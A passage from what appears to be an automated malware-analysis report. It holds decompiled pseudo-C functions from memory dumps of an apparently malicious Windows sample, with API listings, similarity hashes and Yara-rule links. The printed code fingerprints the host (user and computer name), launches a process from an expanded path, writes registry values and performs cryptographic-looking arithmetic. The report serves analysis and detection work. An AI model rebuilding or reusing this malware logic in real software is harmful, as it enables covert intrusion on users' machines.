SysAllocString.OLEAUT32(00000000), ref: 001C6D1F
SysAllocString.OLEAUT32(0070006F), ref: 001C6D33
SysAllocString.OLEAUT32(00000000), ref: 001C6D45
SysFreeString.OLEAUT32(00000000), ref: 001C6DA9
SysFreeString.OLEAUT32(00000000), ref: 001C6DB8
SysFreeString.OLEAUT32(00000000), ref: 001C6DC3

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$CreateInstance
String ID:
API String ID: 1867060851-0
Opcode ID: 2b1c10aeb855fdd84847610366b8fdaa01adc2efad20f344d7d7a22134f3ef44
Instruction ID: db77400eccf3606d2441f64633d299ee4d761ebc20ea9fdc30ff9e31d22bbbf6
Opcode Fuzzy Hash: 2b1c10aeb855fdd84847610366b8fdaa01adc2efad20f344d7d7a22134f3ef44
Instruction Fuzzy Hash: 1F317E32D00609ABDF01DFF8C848AAEBBB6AF58300F144469E915EB120DB71DD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C205E, Relevance: 9.1, APIs: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E001C205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				struct HINSTANCE__* _t52;
				void* _t57;
				void* _t67;
				intOrPtr* _t69;
				struct HINSTANCE__* _t70;

				_t1 = __eax + 0x14; // 0x74183966
				_t68 =  *_t1;
				_t36 = E001C692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E001CA8D8( *((intOrPtr*)(_t68 + 0xc)),  *((intOrPtr*)(_t68 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x1cd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x1cd27c; // 0x317a7d0
					_t18 = _t47 + 0x1ce3e6; // 0x73797325
					_t67 = E001C95B1(_t18);
					if(_t67 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x1cd27c; // 0x317a7d0
						_t19 = _t50 + 0x1ce747; // 0x3348f17
						_t20 = _t50 + 0x1ce0af; // 0x4e52454b
						_t52 = GetModuleHandleA(_t20);
						__imp__(_t52, _t19);
						_t70 = _t52;
						if(_t70 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E001C84D5();
							_t57 = _t70->i(0, _t67, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E001C84D5();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x1cd238, 0, _t67);
					}
				}
				_t69 = _v16;
				 *((intOrPtr*)(_t69 + 0x18))( *((intOrPtr*)(_t69 + 0x1c))( *_t69));
				E001C9039(_t69);
				goto L12;
			}

0x001c2066
0x001c2066
0x001c2075
0x001c207e
0x001c2081
0x001c218e
0x001c2195
0x001c2195
0x001c2090
0x001c2098
0x001c209d
0x001c20a0
0x001c20b5
0x001c20bb
0x001c20bc
0x001c20bf
0x001c20c5
0x001c20c8
0x001c20cd
0x001c20d5
0x001c20e1
0x001c20e5
0x001c2175
0x001c20eb
0x001c20eb
0x001c20f0
0x001c20f7
0x001c20fe
0x001c2105
0x001c210b
0x001c210f
0x001c215e
0x001c2111
0x001c2112
0x001c2119
0x001c2132
0x001c2134
0x001c2138
0x001c213f
0x001c2159
0x001c2141
0x001c214a
0x001c214f
0x001c214f
0x001c213f
0x001c216d
0x001c216d
0x001c20e5
0x001c217c
0x001c2185
0x001c2189
0x00000000

APIs

Part of subcall function 001C692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,001C207A,?,00000001,?,?,00000000,00000000), ref: 001C6951

memset.NTDLL ref: 001C20C8

Part of subcall function 001C95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001C23E9,63699BCE,001C1354,73797325), ref: 001C95C2
Part of subcall function 001C95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001C95DC

GetModuleHandleA.KERNEL32(4E52454B,03348F17,73797325), ref: 001C20FE
CloseHandle.KERNEL32(00000000), ref: 001C214A
CloseHandle.KERNEL32(?), ref: 001C214F
GetLastError.KERNEL32(00000001), ref: 001C2153
HeapFree.KERNEL32(00000000,00000000), ref: 001C216D

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 4057132268-0
Opcode ID: aacf1f21be56aa9249a3209ece4d2049169fb1fc3f43e62f1d725f54dea00efb
Instruction ID: 688aba264dbe7bd777f9d5f6893111260ab61056b709e05423090b83d53bc5de
Opcode Fuzzy Hash: aacf1f21be56aa9249a3209ece4d2049169fb1fc3f43e62f1d725f54dea00efb
Instruction Fuzzy Hash: D3315CB6800208FFDB109FA4DC89EAFBBBCEB18344F154469F605A7521D734ED458B90

Uniqueness

Uniqueness Score: -1.00%

Function 001C7649, Relevance: 7.6, APIs: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C7649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E001C2049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E001C9039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x1ca33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x001c7657
0x001c765a
0x001c765d
0x001c7663
0x001c7668
0x001c766e
0x001c7676
0x001c7679
0x001c767f
0x001c7684
0x001c7691
0x001c769e
0x001c76a2
0x001c76a4
0x001c76a8
0x001c76ab
0x001c76bb
0x001c770d
0x001c770e
0x001c76bd
0x001c76c0
0x001c76c7
0x001c76ca
0x001c76dd
0x00000000
0x001c76df
0x001c76e2
0x001c76e7
0x001c76f5
0x001c76f8
0x001c7700
0x001c7703
0x00000000
0x001c7705
0x001c7705
0x001c7708
0x001c7708
0x001c7703
0x001c76dd
0x001c7713
0x001c7714
0x001c7684
0x001c771a

APIs

GetUserNameW.ADVAPI32(00000000,001CA338), ref: 001C765D
GetComputerNameW.KERNEL32(00000000,001CA338), ref: 001C7679

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

GetUserNameW.ADVAPI32(00000000,001CA338), ref: 001C76B3
GetComputerNameW.KERNEL32(001CA338,?), ref: 001C76D5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,001CA338,00000000,001CA33A,00000000,00000000,?,?,001CA338), ref: 001C76F8

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 9e15cac122e29044cd91435ede45c90d8de6a153c8d2cf7aa055590f748b76d3
Instruction ID: 2c64acbd11549bfba021b82db83c8c7764149b303bc9c0d51a52d76d99273ef2
Opcode Fuzzy Hash: 9e15cac122e29044cd91435ede45c90d8de6a153c8d2cf7aa055590f748b76d3
Instruction Fuzzy Hash: 6221D47A900208EBCB11DFE9D989DAEBBB9EF54300B5044AAE505E7240EB70DF54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C1585, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E001C7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E001CA9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x1cd130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x001c1585
0x001c1592
0x001c1594
0x001c15f7
0x00000000
0x001c15f7
0x001c15ac
0x001c15b3
0x001c15bf
0x001c15c4
0x001c15c6
0x001c15c8
0x001c15ca
0x001c15cc
0x001c15ce
0x001c15da
0x001c15ea
0x00000000
0x001c15dc
0x001c15dc
0x001c15e3
0x001c15f0
0x001c15f0
0x001c15f0
0x001c15e3
0x001c15da
0x001c15f5
0x00000000
0x00000000
0x001c15fb

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,001C11DA,?,?,00000000,00000000), ref: 001C15BF
ResetEvent.KERNEL32(?), ref: 001C15C4
GetLastError.KERNEL32 ref: 001C15DC
GetLastError.KERNEL32(?,?,00000102,001C11DA,?,?,00000000,00000000), ref: 001C15F7

Part of subcall function 001C7F27: lstrlen.KERNEL32(00000000,00000008,?,766F11C0,?,?,001C15A4,?,?,?,?,00000102,001C11DA,?,?,00000000), ref: 001C7F33
Part of subcall function 001C7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001C15A4,?,?,?,?,00000102,001C11DA,?), ref: 001C7F91
Part of subcall function 001C7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 001C7FA1

SetEvent.KERNEL32(?), ref: 001C15EA

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: ca861c2d7269a9edec566d3198be2c8ea42705fb83ecbb341bee4b3a6d486c7d
Instruction ID: 8222a6564642ea688086089c3ab88069cc2e2fb287d44481bfb082df4a684b01
Opcode Fuzzy Hash: ca861c2d7269a9edec566d3198be2c8ea42705fb83ecbb341bee4b3a6d486c7d
Instruction Fuzzy Hash: AB018631180601BADA316B61EC44F1BBAA8FFA7760F204A29F056910E1DB20EC659A61

Uniqueness

Uniqueness Score: -1.00%

Function 001C17D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001C17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x1cd33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E001C809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E001C88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E001C9039(_a8);
						goto L29;
					}
					_t65 =  *0x1cd27c; // 0x317a7d0
					_t16 = _t65 + 0x1ce8fe; // 0x65696c43
					_t68 = E001C809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d001cc0
						if(E001CA635(_t103,  *_t33, _t97, _a8,  *0x1cd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x1cd27c; // 0x317a7d0
							if(_t104 == 0) {
								_t35 = _t72 + 0x1cea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x1ce89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E001C816C(_t73,  *0x1cd334,  *0x1cd338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x1cd27c; // 0x317a7d0
									_t44 = _t75 + 0x1ce871; // 0x74666f53
									_t78 = E001C809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d001cc0
										E001C2659( *_t47, _t97, _a8,  *0x1cd338, _a24);
										_t49 = _t107 + 0x10; // 0x3d001cc0
										E001C2659( *_t49, _t97, _t105,  *0x1cd330, _a16);
										E001C9039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d001cc0
									E001C2659( *_t40, _t97, _a8,  *0x1cd338, _a24);
									_t43 = _t107 + 0x10; // 0x3d001cc0
									E001C2659( *_t43, _t97, _a8,  *0x1cd330, _a16);
								}
								if( *_t107 != 0) {
									E001C9039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d001cc0
					if(E001C6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d001cc0
							E001CA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E001C9039(_t106);
						_t104 = _a16;
					}
					E001C9039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E001CA8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x1cd33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x001c17d5
0x001c17de
0x001c17e5
0x001c17ea
0x001c1857
0x001c185d
0x001c1862
0x001c186b
0x001c1872
0x001c1875
0x001c19e9
0x001c19f0
0x001c19f0
0x001c19f5
0x001c19f7
0x001c19f7
0x001c1a00
0x001c1a00
0x001c187b
0x001c1887
0x001c19df
0x001c19e2
0x00000000
0x001c19e2
0x001c188d
0x001c1892
0x001c189b
0x001c18a2
0x001c18a5
0x001c18ef
0x001c18ef
0x001c1902
0x001c190c
0x001c1914
0x001c1919
0x001c1923
0x001c1923
0x001c191b
0x001c191b
0x001c191b
0x001c191b
0x001c1945
0x001c194d
0x001c197b
0x001c1980
0x001c1989
0x001c198e
0x001c1992
0x001c19c4
0x001c1994
0x001c19a1
0x001c19a4
0x001c19b4
0x001c19b7
0x001c19bd
0x001c19bd
0x001c194f
0x001c195c
0x001c195f
0x001c1971
0x001c1974
0x001c1974
0x001c19ce
0x001c19da
0x001c19d0
0x001c19d3
0x001c19d3
0x001c19ce
0x001c1945
0x00000000
0x001c190c
0x001c18b4
0x001c18be
0x001c18c0
0x001c18c5
0x001c18c9
0x001c18cb
0x001c18d6
0x001c18d9
0x001c18d9
0x001c18df
0x001c18e4
0x001c18e4
0x001c18ea
0x00000000
0x001c18ea
0x001c17ef
0x00000000
0x001c1816
0x001c1816
0x001c1822
0x001c1835
0x001c183b
0x001c1843
0x00000000
0x001c1843

APIs

StrChrA.SHLWAPI(001C3C81,0000005F), ref: 001C1808
lstrcpy.KERNEL32(?,?), ref: 001C1835

Part of subcall function 001C809F: lstrlen.KERNEL32(?,00000000,001CD330,00000001,001C2200,001CD00C,001CD00C,00000000,00000005,00000000,00000000,?,?,?,001C96C1,001C23E9), ref: 001C80A8
Part of subcall function 001C809F: mbstowcs.NTDLL ref: 001C80CF
Part of subcall function 001C809F: memset.NTDLL ref: 001C80E1

Part of subcall function 001C2659: lstrlenW.KERNEL32(001C3C81,?,?,001C19A9,3D001CC0,80000002,001C3C81,001C8B1E,74666F53,4D4C4B48,001C8B1E,?,3D001CC0,80000002,001C3C81,?), ref: 001C2679

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

lstrcpy.KERNEL32(?,00000000), ref: 001C1857

Strings

\, xrefs: 001C183B

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: 7745d199e541b503bc74f802bc19072b15a7f55483074db32fbdaa23f0054d04
Instruction ID: 0b387f96dd3e05c39e0d54b39114cf0c1df255668bb5bc8a5995988c27ea13e2
Opcode Fuzzy Hash: 7745d199e541b503bc74f802bc19072b15a7f55483074db32fbdaa23f0054d04
Instruction Fuzzy Hash: D4515C76100209FFDF11AFA0DD41FAA3BBABF29704F108429FA1592522DB31DD66DB51

Uniqueness

Uniqueness Score: -1.00%

Function 001C52F9, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E001C52F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x1cd27c; // 0x317a7d0
					_t5 = _t102 + 0x1ce038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x1cc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x1cd27c; // 0x317a7d0
												_t28 = _t108 + 0x1ce0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x1cd27c; // 0x317a7d0
														_t33 = _t78 + 0x1ce078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x001c52fe
0x001c5307
0x001c5308
0x001c530c
0x001c5312
0x001c5318
0x001c5321
0x001c5327
0x001c5331
0x001c5333
0x001c5339
0x001c533e
0x001c5349
0x001c5351
0x001c5354
0x001c5477
0x001c535a
0x001c535a
0x001c5367
0x001c536d
0x001c5373
0x001c5377
0x001c537d
0x001c538a
0x001c538e
0x001c5394
0x001c5397
0x001c539d
0x001c53a3
0x001c53a9
0x001c53ac
0x001c53af
0x001c53b5
0x001c53be
0x001c53c4
0x001c53c5
0x001c53c8
0x001c53c9
0x001c53ca
0x001c53d2
0x001c53d3
0x001c53d4
0x001c53d6
0x001c53da
0x001c53de
0x00000000
0x00000000
0x001c53e4
0x001c53ed
0x001c53f3
0x001c53fd
0x001c5401
0x001c5403
0x001c5410
0x001c5414
0x001c541c
0x001c5421
0x001c5433
0x001c5435
0x001c543b
0x001c543b
0x001c5444
0x001c5444
0x001c5446
0x001c544c
0x001c544c
0x001c544f
0x001c5455
0x001c5458
0x001c5461
0x00000000
0x00000000
0x00000000
0x001c5461
0x001c53b5
0x001c53af
0x001c5397
0x001c5467
0x001c5467
0x001c546d
0x001c546d
0x001c5473
0x001c5473
0x001c547c
0x001c5482
0x001c5482
0x001c533e
0x001c548b

APIs

SysAllocString.OLEAUT32(001CC2B0), ref: 001C5349
lstrcmpW.KERNEL32(00000000,0076006F), ref: 001C542B
SysFreeString.OLEAUT32(00000000), ref: 001C5444
SysFreeString.OLEAUT32(?), ref: 001C5473

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: e94d3bf81ab4ae954b11937b401924189a7cf76c5bb987adb2b489afb66ac2f8
Instruction ID: ed865a0bf8dfc5b98e99277d3986e5b96af408418ca89070a069bf02816ab323
Opcode Fuzzy Hash: e94d3bf81ab4ae954b11937b401924189a7cf76c5bb987adb2b489afb66ac2f8
Instruction Fuzzy Hash: E0516C71D00509EFCB04DFA8C888DAEB7BAEF88705B154598E905EB210E731ED81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C1017, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001C1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E001CA7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E001C968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E001C8967(_t101,  &_v236, _a8, _t96 - _t81);
					E001C8967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E001C968F(_t101,  &E001CD1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E001C968F(_a16, _a4);
						E001C1D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L001CB0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L001CB0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E001C1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E001C8B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E001C9100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E001CD1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x001c101a
0x001c1026
0x001c102c
0x001c1031
0x001c1035
0x001c1192
0x001c1196
0x001c1196
0x001c103b
0x001c103f
0x001c1045
0x001c1046
0x001c1051
0x001c1057
0x001c105c
0x001c105f
0x001c1079
0x001c1085
0x001c108e
0x001c1098
0x001c109d
0x001c109f
0x001c10a2
0x001c1150
0x001c1156
0x001c1167
0x001c117a
0x001c118a
0x00000000
0x001c118f
0x001c10ab
0x001c10b2
0x001c10b6
0x001c10bc
